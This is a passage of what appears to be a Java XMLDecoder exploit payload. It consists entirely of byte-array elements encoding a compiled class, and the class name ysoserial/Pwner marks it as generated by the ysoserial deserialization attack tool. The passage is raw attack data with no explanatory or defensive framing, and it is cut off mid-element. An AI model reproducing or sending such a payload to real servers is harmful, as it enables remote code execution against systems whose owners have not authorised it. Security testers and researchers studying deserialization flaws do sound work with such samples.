index=\"3277\"><byte>119</byte></void><void index=\"3278\"><byte>97</byte></void><void index=\"3279\"><byte>98</byte></void><void index=\"3280\"><byte>108</byte></void><void index=\"3281\"><byte>101</byte></void><void index=\"3282\"><byte>7</byte></void><void index=\"3283\"><byte>0</byte></void><void index=\"3284\"><byte>-84</byte></void><void index=\"3285\"><byte>10</byte></void><void index=\"3286\"><byte>0</byte></void><void index=\"3287\"><byte>-83</byte></void><void index=\"3288\"><byte>0</byte></void><void index=\"3289\"><byte>91</byte></void><void index=\"3290\"><byte>1</byte></void><void index=\"3291\"><byte>0</byte></void><void index=\"3292\"><byte>19</byte></void><void index=\"3293\"><byte>106</byte></void><void index=\"3294\"><byte>97</byte></void><void index=\"3295\"><byte>118</byte></void><void index=\"3296\"><byte>97</byte></void><void index=\"3297\"><byte>47</byte></void><void index=\"3298\"><byte>105</byte></void><void index=\"3299\"><byte>111</byte></void><void index=\"3300\"><byte>47</byte></void><void index=\"3301\"><byte>80</byte></void><void index=\"3302\"><byte>114</byte></void><void index=\"3303\"><byte>105</byte></void><void index=\"3304\"><byte>110</byte></void><void index=\"3305\"><byte>116</byte></void><void index=\"3306\"><byte>83</byte></void><void index=\"3307\"><byte>116</byte></void><void index=\"3308\"><byte>114</byte></void><void index=\"3309\"><byte>101</byte></void><void index=\"3310\"><byte>97</byte></void><void index=\"3311\"><byte>109</byte></void><void index=\"3312\"><byte>7</byte></void><void index=\"3313\"><byte>0</byte></void><void index=\"3314\"><byte>-81</byte></void><void index=\"3315\"><byte>1</byte></void><void index=\"3316\"><byte>0</byte></void><void index=\"3317\"><byte>7</byte></void><void index=\"3318\"><byte>112</byte></void><void index=\"3319\"><byte>114</byte></void><void index=\"3320\"><byte>105</byte></void><void index=\"3321\"><byte>110</byte></void><void index=\"3322\"><byte>116</byte></void><void index=\"3323\"><byte>108</byte></void><void index=\"3324\"><byte>110</byte></void><void index=\"3325\"><byte>12</byte></void><void index=\"3326\"><byte>0</byte></void><void index=\"3327\"><byte>-79</byte></void><void index=\"3328\"><byte>0</byte></void><void index=\"3329\"><byte>71</byte></void><void index=\"3330\"><byte>10</byte></void><void index=\"3331\"><byte>0</byte></void><void index=\"3332\"><byte>-80</byte></void><void index=\"3333\"><byte>0</byte></void><void index=\"3334\"><byte>-78</byte></void><void index=\"3335\"><byte>1</byte></void><void index=\"3336\"><byte>0</byte></void><void index=\"3337\"><byte>15</byte></void><void index=\"3338\"><byte>112</byte></void><void index=\"3339\"><byte>114</byte></void><void index=\"3340\"><byte>105</byte></void><void index=\"3341\"><byte>110</byte></void><void index=\"3342\"><byte>116</byte></void><void index=\"3343\"><byte>83</byte></void><void index=\"3344\"><byte>116</byte></void><void index=\"3345\"><byte>97</byte></void><void index=\"3346\"><byte>99</byte></void><void index=\"3347\"><byte>107</byte></void><void index=\"3348\"><byte>84</byte></void><void index=\"3349\"><byte>114</byte></void><void index=\"3350\"><byte>97</byte></void><void index=\"3351\"><byte>99</byte></void><void index=\"3352\"><byte>101</byte></void><void index=\"3353\"><byte>12</byte></void><void index=\"3354\"><byte>0</byte></void><void index=\"3355\"><byte>-76</byte></void><void index=\"3356\"><byte>0</byte></void><void index=\"3357\"><byte>11</byte></void><void index=\"3358\"><byte>10</byte></void><void index=\"3359\"><byte>0</byte></void><void index=\"3360\"><byte>-83</byte></void><void index=\"3361\"><byte>0</byte></void><void index=\"3362\"><byte>-75</byte></void><void index=\"3363\"><byte>1</byte></void><void index=\"3364\"><byte>0</byte></void><void index=\"3365\"><byte>13</byte></void><void index=\"3366\"><byte>83</byte></void><void index=\"3367\"><byte>116</byte></void><void index=\"3368\"><byte>97</byte></void><void index=\"3369\"><byte>99</byte></void><void index=\"3370\"><byte>107</byte></void><void index=\"3371\"><byte>77</byte></void><void index=\"3372\"><byte>97</byte></void><void index=\"3373\"><byte>112</byte></void><void index=\"3374\"><byte>84</byte></void><void index=\"3375\"><byte>97</byte></void><void index=\"3376\"><byte>98</byte></void><void index=\"3377\"><byte>108</byte></void><void index=\"3378\"><byte>101</byte></void><void index=\"3379\"><byte>1</byte></void><void index=\"3380\"><byte>0</byte></void><void index=\"3381\"><byte>29</byte></void><void index=\"3382\"><byte>121</byte></void><void index=\"3383\"><byte>115</byte></void><void index=\"3384\"><byte>111</byte></void><void index=\"3385\"><byte>115</byte></void><void index=\"3386\"><byte>101</byte></void><void index=\"3387\"><byte>114</byte></void><void index=\"3388\"><byte>105</byte></void><void index=\"3389\"><byte>97</byte></void><void index=\"3390\"><byte>108</byte></void><void index=\"3391\"><byte>47</byte></void><void index=\"3392\"><byte>80</byte></void><void index=\"3393\"><byte>119</byte></void><void index=\"3394\"><byte>110</byte></void><void index=\"3395\"><byte>101</byte></void><void index=\"3396\"><byte>114</byte></void><void index=\"3397\"><byte>52</byte></void><void index=\"3398\"><byte>53</byte></void><void index=\"3399\"><byte>52</byte></void><void index=\"3400\"><byte>51</byte></void><void index=\"3401\"><byte>56</byte></void><void index=\"3402\"><byte>51</byte></void><void index=\"3403\"><byte>49</byte></void><void index=\"3404\"><byte>52</byte></void><void index=\"3405\"><byte>50</byte></void><void index=\"3406\"><byte>55</byte></void><void index=\"3407\"><byte>56</byte></void><void index=\"3408\"><byte>57</byte></void><void index=\"3409\"><byte>57</byte></void><void index=\"3410\"><byte>50</byte></void><void index=\"3411\"><byte>1</byte></void><void index=\"3412\"><byte>0</byte></void><void index=\"3413\"><byte>31</byte></void><void index=\"3414\"><byte>76</byte></void><void index=\"3415\"><byte>121</byte></void><void index=\"3416\"><byte>115</byte></void><void index=\"3417\"><byte>111</byte></void><void index=\"3418\"><byte>115</byte></void><void index=\"3419\"><byte>101</byte></void><void index=\"3420\"><byte>114</byte></void><void index=\"3421\"><byte>105</byte></void><void index=\"3422\"><byte>97</byte></void><void index=\"3423\"><byte>108</byte></void><void index=\"3424\"><byte>47</byte></void><void index=\"3425\"><byte>80</byte></void><void index=\"3426\"><byte>119</byte></void><void index=\"3427\"><byte>110</byte></void><void index=\"3428\"><byte>101</byte></void><void index=\"3429\"><byte>114</byte></void><void index=\"3430\"><byte>52</byte></void><void index=\"3431\"><byte>53</byte></void><void index=\"3432\"><byte>52</byte></void><void index=\"3433\"><byte>51</byte></void><void index=\"3434\"><byte>56</byte></void><void index=\"3435\"><byte>51</byte></void><void index=\"3436\"><byte>49</byte></void><void index=\"3437\"><byte>52</byte></void><void index=\"3438\"><byte>50</byte></void><void index=\"3439\"><byte>55</byte></void><void index=\"3440\"><byte>56</byte></void><void index=\"3441\"><byte>57</byte></void><void index=\"3442\"><byte>57</byte></void><void index=\"3443\"><byte>50</byte></void><void index=\"3444\"><byte>59</byte></void><void index=\"3445\"><byte>0</byte></void><void index=\"3446\"><byte>33</byte></void><void index=\"3447\"><byte>0</byte></void><void index=\"3448\"><byte>2</byte></void><void index=\"3449\"><byte>0</byte></void><void index=\"3450\"><byte>3</byte></void><void index=\"3451\"><byte>0</byte></void><void index=\"3452\"><byte>1</byte></void><void index=\"3453\"><byte>0</byte></void><void index=\"3454\"><byte>4</byte></void><void index=\"3455\"><byte>0</byte></void><void index=\"3456\"><byte>1</byte></void><void index=\"3457\"><byte>0</byte></void><void index=\"3458\"><byte>26</byte></void><void index=\"3459\"><byte>0</byte></void><void index=\"3460\"><byte>5</byte></void><void index=\"3461\"><byte>0</byte></void><void index=\"3462\"><byte>6</byte></void><void index=\"3463\"><byte>0</byte></void><void index=\"3464\"><byte>1</byte></void><void index=\"3465\"><byte>0</byte></void><void index=\"3466\"><byte>7</byte></void><void index=\"3467\"><byte>0</byte></void><void index=\"3468\"><byte>0</byte></void><void index=\"3469\"><byte>0</byte></void><void index=\"3470\"><byte>2</byte></void><void index=\"3471\"><byte>0</byte></void><void index=\"3472\"><byte>8</byte></void><void index=\"3473\"><byte>0</byte></void><void index=\"3474\"><byte>4</byte></void><void index=\"3475\"><byte>0</byte></void><void index=\"3476\"><byte>1</byte></void><void index=\"3477\"><byte>0</byte></void><void index=\"3478\"><byte>10</byte></void><void index=\"3479\"><byte>0</byte></void><void index=\"3480\"><byte>11</byte></void><void index=\"3481\"><byte>0</byte></void><void index=\"3482\"><byte>1</byte></void><void index=\"3483\"><byte>0</byte></void><void index=\"3484\"><byte>12</byte></void><void index=\"3485\"><byte>0</byte></void><void index=\"3486\"><byte>0</byte></void><void index=\"3487\"><byte>0</byte></void><void index=\"3488\"><byte>47</byte></void><void index=\"3489\"><byte>0</byte></void><void index=\"3490\"><byte>1</byte></void><void index=\"3491\"><byte>0</byte></void><void index=\"3492\"><byte>1</byte></void><void index=\"3493\"><byte>0</byte></void><void index=\"3494\"><byte>0</byte></void><void index=\"3495\"><byte>0</byte></void><void index=\"3496\"><byte>5</byte></void><void index=\"3497\"><byte>42</byte></void><void index=\"3498\"><byte>-73</byte></void><void index=\"3499\"><byte>0</byte></void><void index=\"3500\"><byte>1</byte></void><void index=\"3501\"><byte>-79</byte></void><void index=\"3502\"><byte>0</byte></void><void index=\"3503\"><byte>0</byte></void><void index=\"3504\"><byte>0</byte></void><void index=\"3505\"><byte>2</byte></void><void index=\"3506\"><byte>0</byte></void><void index=\"3507\"><byte>13</byte></void><void index=\"3508\"><byte>0</byte></void><void index=\"3509\"><byte>0</byte></void><void index=\"3510\"><byte>0</byte></void><void index=\"3511\"><byte>6</byte></void><void index=\"3512\"><byte>0</byte></void><void index=\"3513\"><byte>1</byte></void><void index=\"3514\"><byte>0</byte></void><void index=\"3515\"><byte>0</byte></void><void index=\"3516\"><byte>0</byte></void><void index=\"3517\"><byte>47</byte></void><void index=\"3518\"><byte>0</byte></void><void index=\"3519\"><byte>14</byte></void><void index=\"3520\"><byte>0</byte></void><void index=\"3521\"><byte>0</byte></void><void index=\"3522\"><byte>0</byte></void><void index=\"3523\"><byte>12</byte></void><void index=\"3524\"><byte>0</byte></void><void index=\"3525\"><byte>1</byte></void><void index=\"3526\"><byte>0</byte></void><void index=\"3527\"><byte>0</byte></void><void index=\"3528\"><byte>0</byte></void><void index=\"3529\"><byte>5</byte></void><void index=\"3530\"><byte>0</byte></void><void index=\"3531\"><byte>15</byte></void><void index=\"3532\"><byte>0</byte></void><void index=\"3533\"><byte>-71</byte></void><void index=\"3534\"><byte>0</byte></void><void index=\"3535\"><byte>0</byte></void><void index=\"3536\"><byte>0</byte></void><void index=\"3537\"><byte>1</byte></void><void index=\"3538\"><byte>0</byte></void><void index=\"3539\"><byte>19</byte></void><void index=\"3540\"><byte>0</byte></void><void index=\"3541\"><byte>20</byte></void><void index=\"3542\"><byte>0</byte></void><void index=\"3543\"><byte>2</byte></void><void index=\"3544\"><byte>0</byte></void><void index=\"3545\"><byte>12</byte></void><void index=\"3546\"><byte>0</byte></void><void index=\"3547\"><byte>0</byte></void><void index=\"3548\"><byte>0</byte></void><void index=\"3549\"><byte>63</byte></void><void index=\"3550\"><byte>0</byte></void><void index=\"3551\"><byte>0</byte></void><void index=\"3552\"><byte>0</byte></void><void index=\"3553\"><byte>3</byte></void><void index=\"3554\"><byte>0</byte></void><void index=\"3555\"><byte>0</byte></void><void index=\"3556\"><byte>0</byte></void><void index=\"3557\"><byte>1</byte></void><void index=\"3558\"><byte>-79</byte></void><void index=\"3559\"><byte>0</byte></void><void index=\"3560\"><byte>0</byte></void><void index=\"3561\"><byte>0</byte></void><void index=\"3562\"><byte>2</byte></void><void index=\"3563\"><byte>0</byte></void><void index=\"3564\"><byte>13</byte></void><void index=\"3565\"><byte>0</byte></void><void index=\"3566\"><byte>0</byte></void><void index=\"3567\"><byte>0</byte></void><void index=\"3568\"><byte>6</byte></void><void index=\"3569\"><byte>0</byte></void><void index=\"3570\"><byte>1</byte></void><void index=\"3571\"><byte>0</byte></void><void index=\"3572\"><byte>0</byte></void><void index=\"3573\"><byte>0</byte></void><void index=\"3574\"><byte>52</byte></void><void index=\"3575\"><byte>0</byte></void><void index=\"3576\"><byte>14</byte></void><void index=\"3577\"><byte>0</byte></void><void index=\"3578\"><byte>0</byte></void><void index=\"3579\"><byte>0</byte></void><void index=\"3580\"><byte>32</byte></void><void index=\"3581\"><byte>0</byte></void><void index=\"3582\"><byte>3</byte></void><void index=\"3583\"><byte>0</byte></void><void index=\"3584\"><byte>0</byte></void><void index=\"3585\"><byte>0</byte></void><void index=\"3586\"><byte>1</byte></void><void index=\"3587\"><byte>0</byte></void><void index=\"3588\"><byte>15</byte></void><void index=\"3589\"><byte>0</byte></void><void index=\"3590\"><byte>-71</byte></void><void index=\"3591\"><byte>0</byte></void><void index=\"3592\"><byte>0</byte></void><void index=\"3593\"><byte>0</byte></void><void index=\"3594\"><byte>0</byte></void><void index=\"3595\"><byte>0</byte></void><void index=\"3596\"><byte>1</byte></void><void index=\"3597\"><byte>0</byte></void><void index=\"3598\"><byte>21</byte></void><void index=\"3599\"><byte>0</byte></void><void index=\"3600\"><byte>22</byte></void><void index=\"3601\"><byte>0</byte></void><void index=\"3602\"><byte>1</byte></void><void index=\"3603\"><byte>0</byte></void><void index=\"3604\"><byte>0</byte></void><void index=\"3605\"><byte>0</byte></void><void index=\"3606\"><byte>1</byte></void><void index=\"3607\"><byte>0</byte></void><void index=\"3608\"><byte>23</byte></void><void index=\"3609\"><byte>0</byte></void><void index=\"3610\"><byte>24</byte></void><void index=\"3611\"><byte>0</byte></void><void index=\"3612\"><byte>2</byte></void><void index=\"3613\"><byte>0</byte></void><void index=\"3614\"><byte>25</byte></void><void index=\"3615\"><byte>0</byte></void><void index=\"3616\"><byte>0</byte></void><void index=\"3617\"><byte>0</byte></void><void index=\"3618\"><byte>4</byte></void><void index=\"3619\"><byte>0</byte></void><void index=\"3620\"><byte>1</byte></void><void index=\"3621\"><byte>0</byte></void><void index=\"3622\"><byte>26</byte></void><void index=\"3623\"><byte>0</byte></void><void index=\"3624\"><byte>1</byte></void><void index=\"3625\"><byte>0</byte></void><void index=\"3626\"><byte>19</byte></void><void index=\"3627\"><byte>0</byte></void><void index=\"3628\"><byte>27</byte></void><void index=\"3629\"><byte>0</byte></void><void index=\"3630\"><byte>2</byte></void><void index=\"3631\"><byte>0</byte></void><void index=\"3632\"><byte>12</byte></void><void index=\"3633\"><byte>0</byte></void><void index=\"3634\"><byte>0</byte></void><void index=\"3635\"><byte>0</byte></void><void index=\"3636\"><byte>73</byte></void><void index=\"3637\"><byte>0</byte></void><void index=\"3638\"><byte>0</byte></void><void index=\"3639\"><byte>0</byte></void><void index=\"3640\"><byte>4</byte></void><void index=\"3641\"><byte>0</byte></void><void index=\"3642\"><byte>0</byte></void><void index=\"3643\"><byte>0</byte></void><void index=\"3644\"><byte>1</byte></void><void index=\"3645\"><byte>-79</byte></void><void index=\"3646\"><byte>0</byte></void><void index=\"3647\"><byte>0</byte></void><void index=\"3648\"><byte>0</byte></void><void index=\"3649\"><byte>2</byte></void><void index=\"3650\"><byte>0</byte></void><void index=\"3651\"><byte>13</byte></void><void index=\"3652\"><byte>0</byte></void><void index=\"3653\"><byte>0</byte></void><void index=\"3654\"><byte>0</byte></void><void index=\"3655\"><byte>6</byte></void><void index=\"3656\"><byte>0</byte></void><void index=\"3657\"><byte>1</byte></void><void index=\"3658\"><byte>0</byte></void><void index=\"3659\"><byte>0</byte></void><void index=\"3660\"><byte>0</byte></void><void index=\"3661\"><byte>56</byte></void><void index=\"3662\"><byte>0</byte></void><void index=\"3663\"><byte>14</byte></void><void index=\"3664\"><byte>0</byte></void><void index=\"3665\"><byte>0</byte></void><void index=\"3666\"><byte>0</byte></void><void index=\"3667\"><byte>42</byte></void><void index=\"3668\"><byte>0</byte></void><void index=\"3669\"><byte>4</byte></void><void index=\"3670\"><byte>0</byte></void><void index=\"3671\"><byte>0</byte></void><void index=\"3672\"><byte>0</byte></void><void index=\"3673\"><byte>1</byte></void><void index=\"3674\"><byte>0</byte></void><void index=\"3675\"><byte>15</byte></void><void index=\"3676\"><byte>0</byte></void><void index=\"3677\"><byte>-71</byte></void><void index=\"3678\"><byte>0</byte></void><void index=\"3679\"><byte>0</byte></void><void index=\"3680\"><byte>0</byte></void><void index=\"3681\"><byte>0</byte></void><void index=\"3682\"><byte>0</byte></void><void index=\"3683\"><byte>1</byte></void><void index=\"3684\"><byte>0</byte></void><void index=\"3685\"><byte>21</byte></void><void index=\"3686\"><byte>0</byte></void><void index=\"3687\"><byte>22</byte></void><void index=\"3688\"><byte>0</byte></void><void index=\"3689\"><byte>1</byte></void><void index=\"3690\"><byte>0</byte></void><void index=\"3691\"><byte>0</byte></void><void index=\"3692\"><byte>0</byte></void><void index=\"3693\"><byte>1</byte></void><void index=\"3694\"><byte>0</byte></void><void index=\"3695\"><byte>28</byte></void><void index=\"3696\"><byte>0</byte></void><void index=\"3697\"><byte>29</byte></void><void index=\"3698\"><byte>0</byte></void><void index=\"3699\"><byte>2</byte></void><void index=\"3700\"><byte>0</byte></void><void index=\"3701\"><byte>0</byte></void><void index=\"3702\"><byte>0</byte></void><void index=\"3703\"><byte>1</byte></void><void index=\"3704\"><byte>0</byte></void><void index=\"3705\"><byte>30</byte></void><void index=\"3706\"><byte>0</byte></void><void index=\"3707\"><byte>31</byte></void><void index=\"3708\"><byte>0</byte></void><void index=\"3709\"><byte>3</byte></void><void index=\"3710\"><byte>0</byte></void><void index=\"3711\"><byte>25</byte></void><void index=\"3712\"><byte>0</byte></void><void index=\"3713\"><byte>0</byte></void><void index=\"3714\"><byte>0</byte></void><void index=\"3715\"><byte>4</byte></void><void index=\"3716\"><byte>0</byte></void><void index=\"3717\"><byte>1</byte></void><void index=\"3718\"><byte>0</byte></void><void index=\"3719\"><byte>26</byte></void><void index=\"3720\"><byte>0</byte></void><void index=\"3721\"><byte>8</byte></void><void index=\"3722\"><byte>0</byte></void><void index=\"3723\"><byte>41</byte></void><void index=\"3724\"><byte>0</byte></void><void index=\"3725\"><byte>11</byte></void><void index=\"3726\"><byte>0</byte></void><void index=\"3727\"><byte>1</byte></void><void index=\"3728\"><byte>0</byte></void><void index=\"3729\"><byte>12</byte></void><void index=\"3730\"><byte>0</byte></void><void index=\"3731\"><byte>0</byte></void><void index=\"3732\"><byte>1</byte></void><void index=\"3733\"><byte>114</byte></void><void index=\"3734\"><byte>0</byte></void><void index=\"3735\"><byte>7</byte></void><void index=\"3736\"><byte>0</byte></void><void index=\"3737\"><byte>11</byte></void><void index=\"3738\"><byte>0</byte></void><void index=\"3739\"><byte>0</byte></void><void index=\"3740\"><byte>1</byte></void><void index=\"3741\"><byte>18</byte></void><void index=\"3742\"><byte>-89</byte></void><void index=\"3743\"><byte>0</byte></void><void index=\"3744\"><byte>3</byte></void><void index=\"3745\"><byte>1</byte></void><void index=\"3746\"><byte>76</byte></void><void index=\"3747\"><byte>-72</byte></void><void index=\"3748\"><byte>0</byte></void><void index=\"3749\"><byte>47</byte></void><void index=\"3750\"><byte>-64</byte></void><void index=\"3751\"><byte>0</byte></void><void index=\"3752\"><byte>49</byte></void><void index=\"3753\"><byte>-74</byte></void><void index=\"3754\"><byte>0</byte></void><void index=\"3755\"><byte>53</byte></void><void index=\"3756\"><byte>-64</byte></void><void index=\"3757\"><byte>0</byte></void><void index=\"3758\"><byte>55</byte></void><void index=\"3759\"><byte>18</byte></void><void index=\"3760\"><byte>57</byte></void><void index=\"3761\"><byte>-74</byte></void><void index=\"3762\"><byte>0</byte></void><void index=\"3763\"><byte>61</byte></void><void index=\"3764\"><byte>77</byte></void><void index=\"3765\"><byte>-72</byte></void><void index=\"3766\"><byte>0</byte></void><void index=\"3767\"><byte>47</byte></void><void index=\"3768\"><byte>-64</byte></void><void index=\"3769\"><byte>0</byte></void><void index=\"3770\"><byte>49</byte></void><void index=\"3771\"><byte>-74</byte></void><void index=\"3772\"><byte>0</byte></void><void index=\"3773\"><byte>53</byte></void><void index=\"3774\"><byte>-64</byte></void><void index=\"3775\"><byte>0</byte></void><void index=\"3776\"><byte>55</byte></void><void index=\"3777\"><byte>-74</byte></void><void index=\"3778\"><byte>0</byte></void><void index=\"3779\"><byte>65</byte></void><void index=\"3780\"><byte>78</byte></void><void index=\"3781\"><byte>45</byte></void><void index=\"3782\"><byte>18</byte></void><void index=\"3783\"><byte>67</byte></void><void index=\"3784\"><byte>-74</byte></void><void index=\"3785\"><byte>0</byte></void><void index=\"3786\"><byte>73</byte></void><void index=\"3787\"><byte>45</byte></void><void index=\"3788\"><byte>-74</byte></void><void index=\"3789\"><byte>0</byte></void><void index=\"3790\"><byte>77</byte></void><void index=\"3791\"><byte>58</byte></void><void index=\"3792\"><byte>4</byte></void><void index=\"3793\"><byte>25</byte></void><void index=\"3794\"><byte>4</byte></void><void index=\"3795\"><byte>-69</byte></void><void index=\"3796\"><byte>0</byte></void><void index=\"3797\"><byte>79</byte></void><void index=\"3798\"><byte>89</byte></void><void index=\"3799\"><byte>-69</byte></void><void index=\"3800\"><byte>0</byte></void><void index=\"3801\"><byte>81</byte></void><void index=\"3802\"><byte>89</byte></void><void index=\"3803\"><byte>-73</byte></void><void index=\"3804\"><byte>0</byte></void><void index=\"3805\"><byte>82</byte></void><void index=\"3806\"><byte>44</byte></void><void index=\"3807\"><byte>-74</byte></void><void index=\"3808\"><byte>0</byte></void><void index=\"3809\"><byte>86</byte></void><void index=\"3810\"><byte>18</byte></void><void index=\"3811\"><byte>88</byte></void><void index=\"3812\"><byte>-74</byte></void><void index=\"3813\"><byte>0</byte></void><void index=\"3814\"><byte>86</byte></void><void index=\"3815\"><byte>-74</byte></void><void index=\"3816\"><byte>0</byte></void><void index=\"3817\"><byte>92</byte></void><void index=\"3818\"><byte>-73</byte></void><void index=\"3819\"><byte>0</byte></void><void index=\"3820\"><byte>94</byte></void><void index=\"3821\"><byte>-74</byte></void><void index=\"3822\"><byte>0</byte></void><void index=\"3823\"><byte>100</byte></void><void index=\"3824\"><byte>25</byte></void><void index=\"3825\"><byte>4</byte></void><void index=\"3826\"><byte>-74</byte></void><void index=\"3827\"><byte>0</byte></void><void index=\"3828\"><byte>103</byte></void><void index=\"3829\"><byte>18</byte></void><void index=\"3830\"><byte>105</byte></void><void index=\"3831\"><byte>-72</byte></void><void index=\"3832\"><byte>0</byte></void><void index=\"3833\"><byte>110</byte></void><void index=\"3834\"><byte>58</byte></void><void index=\"3835\"><byte>5</byte></void><void index=\"3836\"><byte>25</byte></void><void index=\"3837\"><byte>5</byte></void><void index=\"3838\"><byte>1</byte></void><void index=\"3839\"><byte>-91</byte></void><void index=\"3840\"><byte>0</byte></void><void index=\"3841\"><byte>16</byte></void><void index=\"3842\"><byte>25</byte></void><void index=\"3843\"><byte>5</byte></void><void index=\"3844\"><byte>-74</byte></void><void index=\"3845\"><byte>0</byte></void><void index=\"3846\"><byte>115</byte></void><void index=\"3847\"><byte>18</byte></void><void index=\"3848\"><byte>117</byte></void><void index=\"3849\"><byte>-74</byte></void><void index=\"3850\"><byte>0</byte></void><void index=\"3851\"><byte>121</byte></void><void index=\"3852\"><byte>-102</byte></void><void index=\"3853\"><byte>0</byte></void><void index=\"3854\"><byte>6</byte></void><void index=\"3855\"><byte>-89</byte></void><void index=\"3856\"><byte>0</byte></void><void index=\"3857\"><byte>33</byte></void><void index=\"3858\"><byte>-72</byte></void><void index=\"3859\"><byte>0</byte></void><void index=\"3860\"><byte>127</byte></void><void index=\"3861\"><byte>-69</byte></void><void index=\"3862\"><byte>0</byte></void><void index=\"3863\"><byte>81</byte></void><void index=\"3864\"><byte>89</byte></void><void index=\"3865\"><byte>-73</byte></void><void index=\"3866\"><byte>0</byte></void><void index=\"3867\"><byte>82</byte></void><void index=\"3868\"><byte>18</byte></void><void index=\"3869\"><byte>-127</byte></void><void index=\"3870\"><byte>-74</byte></void><void index=\"3871\"><byte>0</byte></void><void index=\"3872\"><byte>86</byte></void><void index=\"3873\"><byte>44</byte></void><void index=\"3874\"><byte>-74</byte></void><void index=\"3875\"><byte>0</byte></void><void index=\"3876\"><byte>86</byte></void><void index=\"3877\"><byte>-74</byte></void><void index=\"3878\"><byte>0</byte></void><void index=\"3879\"><byte>92</byte></void><void index=\"3880\"><byte>-74</byte></void><void index=\"3881\"><byte>0</byte></void><void index=\"3882\"><byte>-123</byte></void><void index=\"3883\"><byte>58</byte></void><void index=\"3884\"><byte>6</byte></void><void index=\"3885\"><byte>-89</byte></void><void index=\"3886\"><byte>0</byte></void><void index=\"3887\"><byte>30</byte></void><void index=\"3888\"><byte>-72</byte></void><void index=\"3889\"><byte>0</byte></void><void index=\"3890\"><byte>127</byte></void><void index=\"3891\"><byte>-69</byte></void><void index=\"3892\"><byte>0</byte></void><void index=\"3893\"><byte>81</byte></void><void index=\"3894\"><byte>89</byte></void><void index=\"3895\"><byte>-73</byte></void><void index=\"3896\"><byte>0</byte></void><void index=\"3897\"><byte>82</byte></void><void index=\"3898\"><byte>18</byte></void><void index=\"3899\"><byte>-121</byte></void><void index=\"3900\"><byte>-74</byte></void><void index=\"3901\"><byte>0</byte></void><void index=\"3902\"><byte>86</byte></void><void index=\"3903\"><byte>44</byte></void><void index=\"3904\"><byte>-74</byte></void><void index=\"3905\"><byte>0</byte></void><void index=\"3906\"><byte>86</byte></void><void index=\"3907\"><byte>-74</byte></void><void index=\"3908\"><byte>0</byte></void><void index=\"3909\"><byte>92</byte></void><void index=\"3910\"><byte>-74</byte></void><void index=\"3911\"><byte>0</byte></void><void index=\"3912\"><byte>-123</byte></void><void index=\"3913\"><byte>58</byte></void><void index=\"3914\"><byte>6</byte></void><void index=\"3915\"><byte>-69</byte></void><void index=\"3916\"><byte>0</byte></void><void index=\"3917\"><byte>-119</byte></void><void index=\"3918\"><byte>89</byte></void><void index=\"3919\"><byte>-69</byte></void><void index=\"3920\"><byte>0</byte></void><void index=\"3921\"><byte>-117</byte></void><void index=\"3922\"><byte>89</byte></void><void index=\"3923\"><byte>25</byte></void><void index=\"3924\"><byte>6</byte></void><void index=\"3925\"><byte>-74</byte></void><void index=\"3926\"><byte>0</byte></void><void index=\"3927\"><byte>-111</byte></void><void index=\"3928\"><byte>18</byte></void><void index=\"3929\"><byte>67</byte></void><void index=\"3930\"><byte>-73</byte></void><void index=\"3931\"><byte>0</byte></void><void index=\"3932\"><byte>-108</byte></void><void index=\"3933\"><byte>-73</byte></void><void index=\"3934\"><byte>0</byte></void><void index=\"3935\"><byte>-105</byte></void><void index=\"3936\"><byte>58</byte></void><void index=\"3937\"><byte>7</byte></void><void index=\"3938\"><byte>1</byte></void><void index=\"3939\"><byte>58</byte></void><void index=\"3940\"><byte>8</byte></void><void index=\"3941\"><byte>18</byte></void><void index=\"3942\"><byte>-103</byte></void><void index=\"3943\"><byte>58</byte></void><void index=\"3944\"><byte>9</byte></void><void index=\"3945\"><byte>-89</byte></void><void index=\"3946\"><byte>0</byte></void><void index=\"3947\"><byte>25</byte></void><void index=\"3948\"><byte>-69</byte></void><void index=\"3949\"><byte>0</byte></void><void index=\"3950\"><byte>81</byte></void><void index=\"3951\"><byte>89</byte></void><void index=\"3952\"><byte>-73</byte></void><void index=\"3953\"><byte>0</byte></void><void index=\"3954\"><byte>82</byte></void><void index=\"3955\"><byte>25</byte></void><void index=\"3956\"><byte>9</byte></void><void index=\"3957\"><byte>-74</byte></void><void index=\"3958\"><byte>0</byte></void><void index=\"3959\"><byte>86</byte></void><void index=\"3960\"><byte>25</byte></void><void index=\"3961\"><byte>8</byte></void><void index=\"3962\"><byte>-74</byte></void><void index=\"3963\"><byte>0</byte></void><void index=\"3964\"><byte>86</byte></void><void index=\"3965\"><byte>-74</byte></void><void index=\"3966\"><byte>0</byte></void><void index=\"3967\"><byte>92</byte></void><void index=\"3968\"><byte>58</byte></void><void index=\"3969\"><byte>9</byte></void><void index=\"3970\"><byte>25</byte></void><void index=\"3971\"><byte>7</byte></void><void index=\"3972\"><byte>-74</byte></void><void index=\"3973\"><byte>0</byte></void><void index=\"3974\"><byte>-100</byte></void><void index=\"3975\"><byte>89</byte></void><void index=\"3976\"><byte>58</byte></void><void index=\"3977\"><byte>8</byte></void><void index=\"3978\"><byte>1</byte></void><void index=\"3979\"><byte>-90</byte></void><void index=\"3980\"><byte>-1</byte></void><void index=\"3981\"><byte>-31</byte></void><void index=\"3982\"><byte>45</byte></void><void index=\"3983\"><byte>-74</byte></void><void index=\"3984\"><byte>0</byte></void><void index=\"3985\"><byte>-96</byte></void><void index=\"3986\"><byte>25</byte></void><void index=\"3987\"><byte>9</byte></void><void index=\"3988\"><byte>-74</byte></void><void index=\"3989\"><byte>0</byte></void><void index=\"3990\"><byte>-91</byte></void><void index=\"3991\"><byte>-89</byte></void><void index=\"3992\"><byte>0</byte></void><void index=\"3993\"><byte>24</byte></void><void index=\"3994\"><byte>58</byte></void><void index=\"3995\"><byte>10</byte></void><void index=\"3996\"><byte>-78</byte></void><void index=\"3997\"><byte>0</byte></void><void index=\"3998\"><byte>-85</byte></void><void index=\"3999\"><byte>25</byte></void><void index=\"4000\"><byte>10</byte></void><void index=\"4001\"><byte>-74</byte></void><void index=\"4002\"><byte>0</byte></void><void index=\"4003\"><byte>-82</byte></void><void index=\"4004\"><byte>-74</byte></void><void index=\"4005\"><byte>0</byte></void><void index=\"4006\"><byte>-77</byte></void><void index=\"4007\"><byte>25</byte></void><void index=\"4008\"><byte>10</byte></void><void index=\"4009\"><byte>-74</byte></void><void index=\"4010\"><byte>0</byte></void><void index=\"4011\"><byte>-74</byte></void><void index=\"4012\"><byte>-89</byte></void><void index=\"4013\"><byte>0</byte></void><void index=\"4014\"><byte>3</byte></void><void index=\"4015\"><byte>-79</byte></void><void index=\"4016\"><byte>0</byte></void><void index=\"4017\"><byte>1</byte></void><void index=\"4018\"><byte>0</byte></void><void index=\"4019\"><byte>94</byte></void><void index=\"4020\"><byte>0</byte></void><void 